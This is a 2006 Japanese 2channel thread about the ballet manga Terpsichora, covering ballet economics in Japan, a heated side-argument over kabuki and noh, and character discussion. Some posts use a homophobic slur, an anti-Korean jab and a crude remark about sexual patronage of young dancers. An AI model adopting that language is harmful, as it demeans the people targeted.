落ちぶれた英一の面倒みるために結婚させられたんだよね、確か

613 :花と名無しさん:2006/07/10(月) 18:58:24 ID:???0
>>609
ピアノの発表会もね。
あとお茶やお花の展示なんかも同じだ。

どうでもいいけどな。

614 :花と名無しさん:2006/07/10(月) 18:59:08 ID:???0
しかし、自分が公演で踊るのに相手役にカネを払うなんてのは、プロとはいえないな。
芸術にパトロンはつきものだけど、日本のバレエの世界では親がパトロンってのが多いみたいね。

615 :花と名無しさん:2006/07/10(月) 18:59:50 ID:???0
>>611
水樹に注目しているバレエファンや、駿(だったっけ?)のファンは来そうだね

616 :花と名無しさん:2006/07/10(月) 19:00:40 ID:???0
>>609
まあ、それだからこそ「タクトのブレークダンス」などの演出もありな訳ですな。
>>611の言うように、スターを観に来る人も中にはいるだろうけど。
関係者=みんなの発表会
一般客=スターが見られれば全体の質はどうでもいい
それぞれの満足度は得られる。

617 :花と名無しさん:2006/07/10(月) 19:01:45 ID:???0
>>613
おまえさん、訳知り顔で書いてる割には、なにが問題かわかってないよ。

ピアノやバレエ教室の発表会が、内部の思い出作りの場だってのは
当然だし、なんの問題もないだろ?

問題は、入場料を取るバレエ団の公演までが、内部の思い出作りの場に
なっていて、本当に好きでお金を払って見に来てくれる客がほとんど
いないってこと。

618 :花と名無しさん:2006/07/10(月) 19:02:55 ID:???0
ほとんどいない・・・か。

619 :花と名無しさん:2006/07/10(月) 19:04:19 ID:???0
>>617
年末のくるみが「恒例の、発表会も兼ねた公演」であって、
それとは別にプロだけの公演もあると思っていたけど?

620 :花と名無しさん:2006/07/10(月) 19:08:39 ID:???0
>>619
各バレエ団によって事情はいろいろだろうけど、公演チケットも団員の
割り当てがあって、それを金持ちの親なんかに買い取ってもらい
タダで配ったりするのがまかり通ってる。
客はタダで配られたチケットで、義理で見に来る。

621 :花と名無しさん:2006/07/10(月) 19:13:11 ID:???0
>>620
それはバレエ教室の子供たちも出す「思い出発表会」だよね。
坂口はともかく、他のお友達までこないよね、普通は。
先輩は好きだから自腹切ったんだろうけど。

それ以外に海外からゲストなんかも呼ぶ本格的な公演もありそうだね。

622 :花と名無しさん:2006/07/10(月) 19:19:22 ID:???0
別に、「本格的公演」と「思い出発表会」が二つにはっきり分かれてるわけでもなし。
子役が出るから本格的じゃないってわけでもないよ。
子役も海外ゲストも両方出る公演もあるわけだし。
問題の本質は、演ずる人間が多い割に、客が少ないこと。興行として成立しにくいから、
タダ券ばら撒きみたいなことが不可欠になってしまう。

623 :花と名無しさん:2006/07/10(月) 19:22:16 ID:???0
要約すると
日本ではバレエは食っていけないって事ですか

624 :花と名無しさん:2006/07/10(月) 19:27:19 ID:???0
>>623
それはまあそうだけど。
踊って食っていくのはかなり難しい。
踊りを教えて食っていくのは、わりと可能。
だから五嶋みたいに、実力的にはバレエダンサーとして現役で活躍できる人でも、
職業はダンサーではなくバレエ教師。

625 :花と名無しさん:2006/07/10(月) 19:29:26 ID:???0
芸術の分からない日本人じゃバレエは根付かないよ。

626 :花と名無しさん:2006/07/10(月) 19:34:41 ID:???0
>>625
そんな餌にクマー

627 :花と名無しさん:2006/07/10(月) 19:34:58 ID:???0
キャバレエが根付いたから問題無し。

628 :花と名無しさん:2006/07/10(月) 19:35:53 ID:???0
なんとなくダンサーとしては千恵子さんとゴッシーは似たようなレベルなのかな
と思う。ゴッシーの方がルックスは恵まれてるけれども。

629 :花と名無しさん:2006/07/10(月) 19:37:18 ID:???0
ゴッシーのルックスはいいのか?
エイジャン・ビューテーな感じはするけど。

630 :花と名無しさん:2006/07/10(月) 19:39:46 ID:???0
ノーパンしゃぶしゃぶで接待受けてる人たちが、よろこんでバレエの公演を
見に行くくらいにならないと、踊って食べていける人たちは増えないだろうね。

631 :花と名無しさん:2006/07/10(月) 19:44:36 ID:???0
ノーパンしゃぶしゃぶってまだ存在するの?

632 :花と名無しさん:2006/07/10(月) 19:47:48 ID:???0
シラネ
風俗のことは大阪で聞いてくれ

633 :花と名無しさん:2006/07/10(月) 19:50:47 ID:RuMBui9VO
バレエの公演チケット…高いからなぁ

634 :花と名無しさん:2006/07/10(月) 19:51:46 ID:???0
>>630
バレエの公演をみて、コールドの子から好みの子を指名してお楽しみ付きと
いうのならいいかも。
勿論その子がバレエを続けるのに必要な金を出して支援するという。
それこそ正しい舞踊手とパトロンの関係。

635 :花と名無しさん:2006/07/10(月) 19:51:56 ID:???O
>>621
知り合いが出演してる訳でもなく
ただいじめの対象者の妹が出る発表会の為に見に行った毛箱たんの事も思い出してください。

636 :花と名無しさん:2006/07/10(月) 19:52:15 ID:???0
詩織・草間>五島>千恵子・金子
だと思ってた

637 :花と名無しさん:2006/07/10(月) 19:53:01 ID:???0
>>629
六花が「憎たらしいけど美人なのは認める」って言ってなかったっけ?

638 :花と名無しさん:2006/07/10(月) 19:54:44 ID:???0
>>635
あれは団の公演じゃなくて、教室の発表会じゃなかったっけ?
入場料のいらんやつ。

639 :花と名無しさん:2006/07/10(月) 19:54:46 ID:???0
>>624
おお、なるほど!日本のプロゴルファーの殆どがレッスンプロで、
億単位稼げるのが極一握りだというのと同じね。
(まあ、バレエの場合は世界的に超一流でもそんなには稼げないか)
↑質の問題ではなく、みんなが好きなスポーツはスポンサーが付くって事ですが。

確かにテレビでゴルフ観る人多いしゴルフ番組もコンスタントにあるけど、
バレエは日本には根付きにくいか…。
芸術は遠くでいやいや眺めるもの、という風土はあるよね。
決して日本人が芸術理解できないとは思わんけど。

640 :花と名無しさん:2006/07/10(月) 19:54:48 ID:???0
>>635
あれねぇ....なかなか凄い執念だと思うが。
そうまでしてチカをののしりたかったというあたり、ただのいじめを越えてるよ。


641 :花と名無しさん:2006/07/10(月) 19:56:31 ID:???0
日本には歌舞伎も能も狂言もある。
国がバレエと歌舞伎と、どちらに税金をつぎ込むべきか、と言われたら
当然歌舞伎のほうだろう。
国の援助なんて無くて当然。これでいいのだ。

642 :花と名無しさん:2006/07/10(月) 19:56:31 ID:???0
>>640
個人的には「ワックスつけたままのマナー違反ダンサー=毛箱の友達」だと思ってた。
類は友を呼ぶというし。
チカを観に来たのはそのついでもあるかと。

643 :花と名無しさん:2006/07/10(月) 19:57:06 ID:???0
>>641
あと日舞か。

644 :花と名無しさん:2006/07/10(月) 19:57:07 ID:???O
>>634
利夫と千恵子のきっかけはそ れ だ !

645 :花と名無しさん:2006/07/10(月) 19:58:46 ID:???0
>>641
どっちが外貨を稼げるかってことを考えると当然でしょう。

646 :花と名無しさん:2006/07/10(月) 19:59:04 ID:???0
千花入院中だったから、いくら妹の発表会でも来るかどうかわからないし
来たとしても家族がそばにいることも予想がつくはずなのに
あの1人っきりになる一瞬を待っていたのだとしたら
ストーカーに近いものがある…

647 :花と名無しさん:2006/07/10(月) 19:59:23 ID:???0
玉蹴り祭りがやっと終わった。
オレンジなんとかの、うざい歌強制的に聞かせられる必要がなくなって
良かった。

648 :花と名無しさん:2006/07/10(月) 20:00:22 ID:???0
別に観なければ良かったのでは…

649 :花と名無しさん:2006/07/10(月) 20:01:34 ID:???0
一切見なかったけど、ニュースで出るのも不愉快だった。
あとあのクソ歌。オレンジなんとかは芯でほしい。

650 :花と名無しさん:2006/07/10(月) 20:02:12 ID:???O
>>642
ワックスちゃんが篠原の発表会に出るんなら
当然ユキチカも顔見知りでしょう。

651 :花と名無しさん:2006/07/10(月) 20:03:32 ID:???0
歌舞伎も能もつまらないんだから、廃止してその分をバレエに回せれば
全部解決してチカみたいな可愛そうな子も出ないのにね。

652 :花と名無しさん:2006/07/10(月) 20:03:43 ID:???0
>>642
それは少し思いこみが過ぎるとオモ

653 :花と名無しさん:2006/07/10(月) 20:04:56 ID:???0
>>626>>651
同じ人かなー、なんか毛箱みたい。
ひねくれたことを言うのが好きなのかな?

654 :花と名無しさん:2006/07/10(月) 20:05:26 ID:???0
>>642
結構義理堅いんだな<毛箱

655 :花と名無しさん:2006/07/10(月) 20:05:35 ID:???0
>>651
それは自分の好みのものだけで身の回りを飾りたいというだけでは。
むしろバレエが国技に近い国に行けばいいんでね?

656 :花と名無しさん:2006/07/10(月) 20:06:00 ID:???0
>>647
見なければいいのに
自分はTVはほとんど見ないよ

ようつべはちょくちょく見るけど

657 :花と名無しさん:2006/07/10(月) 20:07:04 ID:???0
>>653
世の中には人を揉めさせるのが好きな人もいるし、
自分が持ってないものや所属していないものに対して
執拗に妬みの心を持つ人がいるんだよ

658 :花と名無しさん:2006/07/10(月) 20:07:16 ID:???0
ニュースだけは見るからなTV.

659 :花と名無しさん:2006/07/10(月) 20:07:50 ID:???0
>>656
自分と好みの違う世界が「存在することすら許せない」って事じゃないの?
いちいち気に入らない物を見るたび、イライラする人なんだよ。

660 :花と名無しさん:2006/07/10(月) 20:08:01 ID:???0
歌舞伎なんて知っていても何の役にも立たないし、
話題に出ることもないよ。
私の友達もみんなつまらないと言っているし。

661 :花と名無しさん:2006/07/10(月) 20:08:15 ID:???0
心が狭い人って、自分の興味のないものには目くじらをたてるね

662 :花と名無しさん:2006/07/10(月) 20:08:58 ID:???0
>>651
娘道成寺の安珍清姫なんかバレエでやっても面白そうな話だと思うが。

663 :花と名無しさん:2006/07/10(月) 20:09:13 ID:???O
能狂言は面白いよ。
眠くなる面白さ。ああいうのこそ国をあげて残さなきゃだめだ。

歌舞伎も今度パリオペラ座でやるしね。

664 :花と名無しさん:2006/07/10(月) 20:09:14 ID:???0
>>659
同感。そういう人は人間として悲しいくらい器が小さいんだよね

665 :花と名無しさん:2006/07/10(月) 20:10:01 ID:???0
>>660
教養のない子には教養のないお友達がついてまわるということでいいかしら?

666 :花と名無しさん:2006/07/10(月) 20:10:07 ID:???0
それぞれの芸能に歴史や伝統と、それを演じる人と、観て楽しむ人がいるのに
悪口いうのってどういう心境なんだろう?

667 :花と名無しさん:2006/07/10(月) 20:10:08 ID:???0
>>662
おー。それユキが振付けて茜かクミが踊ればいいなあ。

668 :花と名無しさん:2006/07/10(月) 20:11:24 ID:???0
>>663
能とのコラボは上野水香がやってたね。

669 :花と名無しさん:2006/07/10(月) 20:11:47 ID:???0
ユキもクモの糸みたいなのを使ってたもんね。
あれって日本芸能でも使うから、ユキみたいに柔軟な心と頭が
振り付けにはぴったりなのかも

670 :花と名無しさん:2006/07/10(月) 20:11:47 ID:???0
>>662
能はちょっと凄すぎてまだ楽しめないけど、狂言は意外とおもしろいよ。
悪乗りする流れとか2chのおもしろい流れとも通じる。

671 :花と名無しさん:2006/07/10(月) 20:13:15 ID:???0
歌舞伎ってオカマがやるやつでしょw

672 :花と名無しさん:2006/07/10(月) 20:13:56 ID:???O
>>669
くもの糸は歌舞伎をヒントにって言ってたっけ

673 :花と名無しさん:2006/07/10(月) 20:14:10 ID:???0
わざと言ってる人はスルーしよ。

674 :花と名無しさん:2006/07/10(月) 20:14:32 ID:???0
>>671
バレエにはオカマいないのか?

675 :花と名無しさん:2006/07/10(月) 20:14:45 ID:???0
>>671
同意。
能にしたって中国、韓国のパクリだし、本当は内心では退屈でつまらないって
思ってるんでしょ。

676 :花と名無しさん:2006/07/10(月) 20:15:27 ID:???0
>>673
同感。馬鹿はスルーに限る。

>>672
本当に芸術をやる人は、いろんな所からインスピレーションを受けるよね。

677 :花と名無しさん:2006/07/10(月) 20:15:55 ID:???O
狂言はオチがないのが渋い。
あんだけわーわーやってたのに、突然終わって
「えっナニナニ?」みたいなw

678 :花と名無しさん:2006/07/10(月) 20:16:36 ID:???0
>>671って、宝塚っておなべがやるやつでしょっていいそうだな

679 :花と名無しさん:2006/07/10(月) 20:16:43 ID:???O
オカマキノコ大地を忘れるな

680 :花と名無しさん:2006/07/10(月) 20:17:22 ID:???0
心のしみったれた人はほうっておいて、テレプシの話しましょ。

狂言と落語が少し通じるものがあるのかな。
庶民にもわかりやすいし、ウィットに富んでる。

681 :花と名無しさん:2006/07/10(月) 20:18:04 ID:???O
芸術家にはゲイが多いよ

682 :花と名無しさん:2006/07/10(月) 20:18:11 ID:???0
言ってる自分がテレプシの話してなかった。

次回はやっぱり「数年後」からなのかな

683 :花と名無しさん:2006/07/10(月) 20:18:36 ID:???0
つまらないのに無理して盛り上げようとかばってるのが寒い<歌舞伎

684 :花と名無しさん:2006/07/10(月) 20:18:40 ID:???0
>>660
>私の友達もみんなつまらないと言っているし。
この論理が既に子供だろw

685 :花と名無しさん:2006/07/10(月) 20:19:30 ID:???O
>>675
退屈なのが面白いという域にまでいかないとw

686 :花と名無しさん:2006/07/10(月) 20:21:11 ID:???0
クミのエピソードが消化し切れてないからそれが出てくるとは思うけど
どんな形で出てくるんだろう?
お金持ちだったら、整形して出てくるってのもあるかもしれんが、お金なかったし

687 :花と名無しさん:2006/07/10(月) 20:21:52 ID:???0
>>680
バレエがいまいち日本で根付かない(習い事としてではなく、芸術として)のは、
狂言や落語みたいに文化の基礎が違うから、というのもあるかもね。
出典の物語が知識として根付いていない、という意味で。


688 :花と名無しさん:2006/07/10(月) 20:22:43 ID:???0
なんか太った女の子が痩せて歌手になってって話があったよね
あれは体型の問題だったからなんとかなったのかな〜
クミも目頭切開して、顎を削って、鼻にシリコンいれたら何とかならない?

689 :花と名無しさん:2006/07/10(月) 20:24:33 ID:???0
>>688
それをすればなんとかなるけど、その金がありません。

690 :花と名無しさん:2006/07/10(月) 20:25:40 ID:???0
>>687
それはあるよね。親しみやすいかそうでないかは大きな点だと思う。
あとはとにかく歴史じゃない?数百年前からあるものとそうでないものとでは浸透率が違うから。
でも、現代は習い事として狂言はないけどバレエはあるから
少しずつでも変わってるんじゃないかなと思ってる。

691 :花と名無しさん:2006/07/10(月) 20:26:37 ID:???0
欧米人から見れば、日本人の顔なんてみんな空美に見える
ってことねぇ?

692 :花と名無しさん:2006/07/10(月) 20:28:26 ID:???O
艶子がいるから成長しても先が知れてるしね…クミの顔

693 :花と名無しさん:2006/07/10(月) 20:29:11 ID:???0
>>687
バレエが日本に根付かないのは、日本人には芸術が分からないから。
歌舞伎や能を保護するのは、老人しか見ない歌舞伎や能を
保護しないと絶滅するから。

694 :花と名無しさん:2006/07/10(月) 20:29:26 ID:???0
>>687
クラシックバレエのストーリィってもの凄く単純だよ。
かえって歌舞伎の方が凝ってる。

695 :花と名無しさん:2006/07/10(月) 20:30:25 ID:???0
なんでギシ先生はクミちゃんを不細工に設定したんだろう。
山岸漫画ではブスはほぼ確実に悪役だし、クミちゃんにも愛は感じない。
(ふとみちゃんや桜子ちゃんには愛を感じます)
主人公のライバルが不細工って、新しい試みだなーと思う。

696 :花と名無しさん:2006/07/10(月) 20:31:06 ID:???O
能や狂言が中国の真似って…
つまらないという人は、多分大きな劇場でしか見たことがないんだと思うけど
ふつうに野外で民衆のためにやるやつはすごく面白いよ。
土蜘蛛の蜘蛛の糸は客席で奪い合いになる。

まあ私自身、伝統芸能がそこらでやってる土地に来るまで
つまらないと思い込んでたけどさ

697 :花と名無しさん:2006/07/10(月) 20:33:07 ID:???0
>>693
老人しかみないって・・・。
将軍に見出されたときの世阿弥は10代の美少年だったんだけど・・・。
あなた能や歌舞伎について知識あるの?(w

698 :花と名無しさん:2006/07/10(月) 20:35:22 ID:???0
能は田楽・猿楽から発生した日本の芸術ですが・・・。
中国の伝統芸すら知らないのかね、ここに来る人は?
その区別もつかないんだろうけど・・・。
京劇と越劇の区別すらつあかにんだろうね(w

699 :花と名無しさん:2006/07/10(月) 20:35:24 ID:???0
なんで反日が暴れてるの?

700 :花と名無しさん:2006/07/10(月) 20:37:15 ID:???0
中国の伝統芸も日本の伝統芸も見たことのない人が暴れてるよう。
恥かくだけだよ。

701 :花と名無しさん:2006/07/10(月) 20:38:21 ID:???0
歌舞伎、意外と若いお客さん多い。
(若い女の子の和服率高し、お客さん見るのも楽しい)
叩いている奴って一度も見に行った事がないの?

702 :花と名無しさん:2006/07/10(月) 20:38:44 ID:???O
>>693家族でお弁当や屋台で売ってるものを食べながら、マッタリ見るイメージ。基本お祭りだしね<能・狂言・神楽

わからなくもないけど、あまり偏見に捕らわれないほうがいいよ〜。見ると意外と面白いから
ただし歌舞伎はそこらでやらないからよく知らん

703 :花と名無しさん:2006/07/10(月) 20:39:39 ID:???0
そもそも自分の興味ないものを否定している人はまだ子供なんだから
「ふ〜ん」ぐらいでスルーしといた方がいい。
子供が大好きな戦隊ものが大人になれば全然興味ないのと逆。
案外、否定意見を書いてる子が数十年後にはハマってるかもしれない。

704 :花と名無しさん:2006/07/10(月) 20:40:09 ID:???O
老人しか見ないという事はない。
最近日本回帰ブームだし、国立能楽堂に行くと若い女の子と外国人ばっかりだよ。


でも少数だから国で保護しないと絶滅するというのは確かに…
まあ徒弟制度が障害になってるのもあるけどね。

705 :花と名無しさん:2006/07/10(月) 20:40:10 ID:???0
>>695
あれで空美ちゃんが絶世の美少女であってみなさい
テレプシは全然別の話になってしまいます

答 少女ポルノをやりたかった

706 :花と名無しさん:2006/07/10(月) 20:40:20 ID:???0
文楽の継承は血筋でやるわけではないんだよね。
落語もそう。(某ヴァカ母がヴァカ息子に名跡継がせてるが物笑いになってるよね)
ただ、この2つはむしろ例外。

歌舞伎、狂言、能など、日本の芸術は大抵のものが血筋で継承している。
一部養子をとって継承してるのもあるけど。
日本って血筋で継承するものの方が残り易いんじゃないかな?
集金システムなんかもその方が機能し易いし。

バレエはあえてこれに逆らって継承システムをつくろうとしているけど
お教室レベルでは圧倒的に血筋継承じゃん。
やっぱり血筋で継承する方が日本には根付き易いんじゃないかな?

707 :花と名無しさん:2006/07/10(月) 20:40:27 ID:???0
空美は顔変えて出てくるんじゃないだろうか。
美智子先生にもその顔じゃプリマなんて絶対無理!と言われてたし。
本人も顔がブサなのは周りからいつも散々言われてて分かってるし。
出て来ないのは怪しい事して変身用の費用を稼いでいる。
千花そっくりに整形してたら怖いな。

708 :花と名無しさん:2006/07/10(月) 20:40:31 ID:???0
上にも書いたけど歌舞伎はしっかり着飾って見に行く層が多い。
外人も多い。
幕見はそうでもないけど。

709 :花と名無しさん:2006/07/10(月) 20:40:35 ID:???0
>>697
つまらないのは十分分かってるし、そんなことに割く時間もない。
それに世間の認識もその程度。
若者が歌舞伎とかの話で盛り上がってるのみたことある?
そう言う人達が大人になったらどうなるんだろうねえw

710 :花と名無しさん:2006/07/10(月) 20:40:40 ID:???0
>>699
成田スレの在日が来てるんじゃないかと思うんだけど・・・。
半島の人なら中国の伝統芸も日本の伝統芸も知識がないだろうからね。
京劇というのは北京の地方劇で中国の地方にはそれぞれ
その地域の伝統芸がある。一見同じように見えても内容・扮装みんな違う。
広東にも四川にもそれぞれの劇がある。


711 :花と名無しさん:2006/07/10(月) 20:41:27 ID:???0
>>701
どうせ出演者とかの親戚とか関係者でしょw

712 :花と名無しさん:2006/07/10(月) 20:42:29 ID:???0
あまりにスレ違いすぎて面白い派もつまらない派も自演に見える

713 :花と名無しさん:2006/07/10(月) 20:44:02 ID:???0
ほっとこうよ。スルースルー。

714 :花と名無しさん:2006/07/10(月) 20:44:29 ID:???0
空美は整形する、に1票。
お金は稼げるだろうしね。
しかし長野に行ったのではないならまだ東京近郊に潜んでるんだろうか?
あの美智子先生が田舎に行くとは到底思えないし・・・。

715 :花と名無しさん:2006/07/10(月) 20:44:42 ID:???0
昼間のキャラの批判はまだしも反日は・・・


716 :花と名無しさん:2006/07/10(月) 20:44:58 ID:???O
そうだね。もう伝統芸能話はやめます
テレプシに戻そう

717 :花と名無しさん:2006/07/10(月) 20:45:46 ID:???0
ブスの中学生がお金稼げるのか?
小学生ならまだしも。

718 :花と名無しさん:2006/07/10(月) 20:45:50 ID:???0
>>709
>>703

719 :花と名無しさん:2006/07/10(月) 20:46:09 ID:???0
大学の創立記念日に狂言の公演をやった年があったんだけど、行ってびっくり。
ロビーに着物の奥様方がオホホホホという雰囲気で談笑していて、汚い格好で
見に行った学生の俺は、なんだか場違いな感じだったよ。

720 :花と名無しさん:2006/07/10(月) 20:46:34 ID:???0
>>711
歌舞伎見に来る若い女の人は、若い歌舞伎役者のファンがほとんどだよ。
中村獅童とかすごく人気あるの知らない?(あらしのよるに の朗読で
801系のおねーさんの間で一気に人気上昇したし)


721 :花と名無しさん:2006/07/10(月) 20:49:03 ID:???0
http://captain.jikkyo.org/cat/s/1152476230775.jpg

神キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
http://news18.2ch.net/test/read.cgi/mnewsplus/1152293105/51




722 :花と名無しさん:2006/07/10(月) 20:49:26 ID:???0
>>702
あ、そうなんだ、d
若い女の子が着物着慣れていて感心してたけどそういう事情なのね
私も歌舞伎話はこの辺でやめます。

723 :花と名無しさん:2006/07/10(月) 20:51:26 ID:???0
獅童が歌舞伎役者かよ

724 :花と名無しさん:2006/07/10(月) 20:52:53 ID:???0
>>715
つまらないものをつまらないというのがなぜ反日?
何でもマンセーしなければ非国民?w

>>720
中村獅童なんてもうただの芸能人だろw
あんなのに頼らないとレスもできないのかw
結局みんなちゃんと反論できずにスルーとかいってるしw

725 :花と名無しさん:2006/07/10(月) 20:53:58 ID:???0
スルー≠反論できない

726 :花と名無しさん:2006/07/10(月) 20:54:34 ID:???0
>>724
>>703

727 :花と名無しさん:2006/07/10(月) 20:54:38 ID:???0
デジャブ

728 :花と名無しさん:2006/07/10(月) 20:55:27 ID:???0
で、何の話してたんだっけ?

729 :花と名無しさん:2006/07/10(月) 20:56:41 ID:???0
日本ではほとんどのバレエ団の経営が教室を切り離しては成り立たないってハナシ。

730 :花と名無しさん:2006/07/10(月) 20:59:15 ID:???O
個人的には、体育館でストレッチしてたクミが、ユキに「力入れすぎ」ていうシーンが好き
そういや、あの話の前後で、ユキがクミにレオタードあげようとしたら、怒ってたね
哀れみや施しを受けたみたいな感じを受けて、クミはユキのこと嫌いつか憎いみたいになってたけど
自分はあのとき、ユキったら気が利くね、と思ったけど
小学生なのに、自分が好きじゃないだか似合わないだかの色だから、て気を配れてる発言してると思ったし

731 :花と名無しさん:2006/07/10(月) 20:59:43 ID:???0
どうやら歌舞伎は日本政府にだけじゃなく、
このスレの住民にも保護されているようだw
保護しないと絶滅しちゃう伝統貧芸能歌舞伎w

732 :花と名無しさん:2006/07/10(月) 21:01:34 ID:???0
コンプレックスのある人って、他人の善意も素直に受け取れないことが多い。
まあ善意があっても嫌味になることはあるけど。
衝撃のキャラ空美はまた出てくるのかなあ。

733 :花と名無しさん:2006/07/10(月) 21:03:56 ID:???0
>>730
>小学生なのに、自分が好きじゃないだか似合わないだかの色だから、て気を配れてる発言してると思ったし

そのわざとらしい理由は、クミからすればウソ臭すぎてかえって
反発受けたんじゃないの?
俺はそう思った。
恵まれてる人と、そうでない人のギャップ。

734 :花と名無しさん:2006/07/10(月) 21:04:17 ID:???0
それより

千花ちゃん自殺後、祭り状態になったであろう
あの掲示板が気になる。
ケバ子の千花叩きを黙ってROMってたやつらが
急にケバ子の名前や住所を書き込んで
「人殺し」呼ばわりしてるんじゃないかと

735 :花と名無しさん:2006/07/10(月) 21:04:57 ID:???0
>>730
あれは、ほんとに好きじゃない色のレオタードだったんじゃないかと思う。
別に哀れんだわけでもなく、純粋に厚意で「着ないレオタードがあるから
クミちゃんにあげよう」って思ったんだとは思うが。

それよりも、あの場面のチカちゃんの反応が、今回の自殺と関わってる
みたいな話がこれまでにも出てたけど、「ものをあげるのって難しい」
「哀れまれるのはイヤ」って具体的にチカちゃんにどういうことがあったから
ああいう考えになったんだろうね。

736 :花と名無しさん:2006/07/10(月) 21:05:38 ID:???0
>>731
>>703

737 :花と名無しさん:2006/07/10(月) 21:05:46 ID:???0
もしもリアルで埼玉バレコン2位の1が自殺したら、ダンス板にスレくらい立つもんかね?

738 :花と名無しさん:2006/07/10(月) 21:06:22 ID:???0
>>730
その前にバレエシューズ泥棒未遂の件があったせいもあるんじゃないかな。
見られたの気にしてたし。


739 :花と名無しさん:2006/07/10(月) 21:06:44 ID:???0
>>734
ニュー速板ですね。

740 :花と名無しさん:2006/07/10(月) 21:06:54 ID:???0
>>730
小学生だから、頑張ったほうだよね。
もしクミがあんな育ちじゃなくて卑屈でなかったら
むしろ、「わ、ありがと」って素直に受け取ったかもしれないっておもった。

741 :花と名無しさん:2006/07/10(月) 21:07:28 ID:???0
痛いニュースになら立つかも

742 :花と名無しさん:2006/07/10(月) 21:08:30 ID:???0
>>735
別にとくに何もなくても、プライド高くて負けず嫌いだったら、人に
哀れみをかけられるのは嫌、くらい思うんじゃないの?

743 :花と名無しさん:2006/07/10(月) 21:09:39 ID:???0
>>736
反論できないとコピペで逃げるw

744 :花と名無しさん:2006/07/10(月) 21:10:09 ID:???0
>>737
立つかも。前にバレエダンサーがストーカーに殺された時にスレがたった。

ちなみに、今現在いくつかのコンクールで上位入賞してる子の単独スレなら
何本か立ってる。
基本は上位入賞させる教室単位のスレで、生徒名は伏せ字が多いね

745 :花と名無しさん:2006/07/10(月) 21:10:33 ID:???0
ケンカしたいというか、ケチ付けたい人はそれ専用のスレでも立てるかどっかにいって欲しい。
テレプシの話を普通にしたいだけなのに。お子ちゃまはこれだから困るよ。

746 :花と名無しさん:2006/07/10(月) 21:10:33 ID:???0
六花としてはルティレ上手く出来るようになった御礼みたいな
意味もあったのかもね >レオタード

747 :花と名無しさん:2006/07/10(月) 21:11:31 ID:???0
人からの贈り物を「プレゼント」と思って受け取るか
「施し」と思って断るかは
その人の育ちや性格によるのかもね。

748 :花と名無しさん:2006/07/10(月) 21:11:54 ID:???0
>>743
ちゃんとよめ
>>703

749 :花と名無しさん:2006/07/10(月) 21:11:55 ID:???0
でもさあ、子供用でもレオタードって5000円くらいはするんじゃないの?
そんなものを、いくら嫌いな色だからって、ぽんともらえる?
もし貰って帰ってきたら、普通のお母さんなら、相手の親に頂けませんって
電話かけるよ。貧乏でもそうでなくても。
やっぱり、六花は常識が無いと思った。

750 :花と名無しさん:2006/07/10(月) 21:13:46 ID:???0
単行本派だったのに今回の件でダヴィンチ2册も買ってしまったorz

テレプシでギシ先生が本当に描きたいのはお受験ママのエゴの醜さだ
と思って読んでたから千花アボーン展開は有りな方向で受けとれるけ
どバレエとかキャラに感情移入して読んでいるタイプの人だったら今
回の鬱展開はダメージ大きいだろうねぇ…。

にしても「タッチ」パターンで「お空に幻影」のコマときたら悲しい
話なのに思わずニヤニヤしてしまいそうになって困ったw

751 :花と名無しさん:2006/07/10(月) 21:13:47 ID:???0
確かにノートや消しゴムあげるって感じにはいかないわな

752 :花と名無しさん:2006/07/10(月) 21:14:13 ID:???0
六花ちゃんはあの説明で自分だったら素直に受け取るって思ったんだろうから
レオタードくらいポンとあげられる恵まれてる子のおごりってかんじで
クミちゃんじゃなくてもちょっと引くな

753 :花と名無しさん:2006/07/10(月) 21:15:36 ID:???0
常識っていっても、小学生でしょ。
そんなに深く考えずに「クミちゃんレオタードないんだ、あ、私着ないままのレオタードあるから
それあげよう」って思っただけだと思う。
まあ、ユキはこの時点では物質的に恵まれた生活を送ってるから(その表現は幾つもでてくるよね)
ものをあげることに抵抗がなかったんだと思うよ。

754 :花と名無しさん:2006/07/10(月) 21:16:01 ID:???0
>>752
実際、レオタードなんてそこらにいくつも使わないのが転がってんだろ、六花のうちだったら。
金持ちとかいう以前に、自分がかなり特殊な環境にいるんだってことをわかっとらん。

755 :花と名無しさん:2006/07/10(月) 21:16:13 ID:???0
>>749
六花の家はバレエ教室だから安く手に入るんだと思ってた

756 :花と名無しさん:2006/07/10(月) 21:16:46 ID:???0
それが育ちの差ですよ

757 :花と名無しさん:2006/07/10(月) 21:18:47 ID:???0
>>755
いやだから、たとえば六花のうちでは生徒にレオタードを頒布していて、
卸値2500円で手に入るものであったとしても、その環境自体が非常に
恵まれてるってことを、六花はぜんぜん自覚してないよね。
まあ小学生だから厳しいか、とも思うけど。

758 :花と名無しさん:2006/07/10(月) 21:19:01 ID:???0
>>747
貸したつもりなのに
「もらちゃった、ラッキー」という子もいるだろうしね

759 :花と名無しさん:2006/07/10(月) 21:19:51 ID:???0
「レオタードあげるから かわりにバレエ教えて」
といってたら、空美のプライドも傷つかなかったかも

760 :花と名無しさん:2006/07/10(月) 21:22:08 ID:???0
さすがに六花でも、空美にアドバイスくらいなら貰えても
教えてもらうのはプライドが許さないのでは?

761 :花と名無しさん:2006/07/10(月) 21:22:37 ID:???0
とにかくレオタードの件は絶妙のエピソードだよね。
クミにとってレオタードは児童ポルノのモデルをやって、やっとで手に入るものだし、
ユキにとってはお家にいくらでも有るものだし。
一着のレオタードに対する感覚が全然違って当然だわ。

762 :花と名無しさん:2006/07/10(月) 21:23:08 ID:???0
自分の家にありふれてるものの値段は意外としらないもの。
特に子供は。
だからあげる時にも気にしない。

763 :花と名無しさん:2006/07/10(月) 21:24:22 ID:???0
ペラペラなのに高いよなあ。

764 :花と名無しさん:2006/07/10(月) 21:26:29 ID:???0
くるみ割りで六花一人だけ役がなかったのは
バレエ団が社長の娘さんを優先させたせいってのがあって
六花も割りを食ってるよね。
そういえば顔出てないのにフルネーム解ってるな藤田黄菜ちゃん。
ふとみちゃんと桜子ちゃんの苗字解ってないっけ?

765 :花と名無しさん:2006/07/10(月) 21:28:20 ID:???0
苗字出てないよね。

勝手に決めるかw
桜子は薄いから、鈴木桜子とかww

766 :花と名無しさん:2006/07/10(月) 21:29:20 ID:???0
>>764
どうでもいい人の名前は全部イニシャル(AとかFとか)なのにめずらしいね。

767 :花と名無しさん:2006/07/10(月) 21:31:35 ID:pYrfSLE90
今日、もう一度だびちん立ち読みしてきた。
ジゼル=百合の花なの??
(バレエ詳しくなくてスマソ)

768 :花と名無しさん:2006/07/10(月) 21:31:52 ID:???0
逆に金子先生やゴッシー他先生方はは名前がわからない。
六花の視点の話だからかな。

769 :花と名無しさん:2006/07/10(月) 21:33:00 ID:???0
チャコットのレオタードカタログです。先頭にhをつけてドゾー
ttp://www.chacott-jp.com/j/item/wear/index.html

